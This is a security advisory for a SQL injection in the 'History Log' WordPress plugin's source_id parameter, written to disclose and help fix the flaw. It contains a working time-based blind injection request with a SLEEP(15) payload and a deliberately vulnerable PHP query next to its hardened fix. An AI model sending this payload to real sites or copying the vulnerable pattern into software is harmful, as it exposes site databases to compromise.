Description
The plugin does not properly sanitise and escape the source_id parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when the Smash Balloon Social Photo Feed plugin is installed alongside it.
[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on "Delete Source".
SQL Injection occurs via the "source_id" multipart form field in the POST request below. The injected SLEEP(15) delays the response by roughly 15 seconds, which confirms the time-based blind injection:
==================
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Accept: */*
Origin: http://192.168.178.130
Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&view=general
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"

2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="username"

pentester14598
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="nonce"

036ad97501
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv--
==================
The AJAX hook "wp_ajax_sbi_feed_saver_manager_delete_source" passes the unsanitised value of "source_id" on to History Log's function "click5_sbi_instagram_delete_source", where it is used directly in the vulnerable SQL statement.
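The following is an added illustration of the pattern behind this class of bug and of the corresponding fix; it is not History Log's own code, and the function name, table name and nonce action name used here are assumptions for the example. The only identifiers taken from the advisory are the AJAX hook name and the source_id parameter. The vulnerable function shows how the PoC payload lands in the statement; the hardened one casts the value to an integer and binds it through $wpdb->prepare() so it can never be interpreted as SQL.

```php
<?php
// Added example, not the plugin's code. Assumed names for the illustration:
// history_log_delete_source_* (functions), {prefix}click5_sources (table),
// 'sbi_feed_saver_manager_nonce' (nonce action).

// VULNERABLE PATTERN: the raw POST value is concatenated into the query.
// With source_id = "2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)" the
// executed statement becomes
//   DELETE FROM wp_click5_sources WHERE source_id = 2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
// and the response is delayed by ~15 s, which is the time-based oracle the
// PoC relies on.
function history_log_delete_source_vulnerable() {
    global $wpdb;
    $source_id = $_POST['source_id'];                                  // untrusted text
    $sql = "DELETE FROM {$wpdb->prefix}click5_sources WHERE source_id = " . $source_id;
    $wpdb->query( $sql );
    wp_send_json_success();
}

// HARDENED PATTERN: verify the request, coerce to an integer, bind via %d.
function history_log_delete_source_hardened() {
    global $wpdb;

    // Reject requests that do not carry a valid nonce for this action.
    // check_ajax_referer() terminates the request on failure.
    check_ajax_referer( 'sbi_feed_saver_manager_nonce', 'nonce' );

    // Defence in depth: only users allowed to manage the site may delete sources.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // absint() turns any non-numeric payload (including the PoC string) into 0.
    $source_id = isset( $_POST['source_id'] )
        ? absint( wp_unslash( $_POST['source_id'] ) )
        : 0;
    if ( 0 === $source_id ) {
        wp_send_json_error( 'invalid source_id', 400 );
    }

    // %d placeholder: $wpdb->prepare() emits the value as an integer literal,
    // so the WHERE clause can only ever compare against a number.
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}click5_sources WHERE source_id = %d",
        $source_id
    );
    $deleted = $wpdb->query( $sql );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}

// The hook name is the one named in the advisory; registering the hardened
// handler here replaces the vulnerable behaviour.
add_action( 'wp_ajax_sbi_feed_saver_manager_delete_source', 'history_log_delete_source_hardened' );
```

To check a fix of this kind, replay the PoC request above against the patched handler: the response should come back immediately with an error rather than after a 15-second delay, and a plain numeric source_id should still delete the intended row.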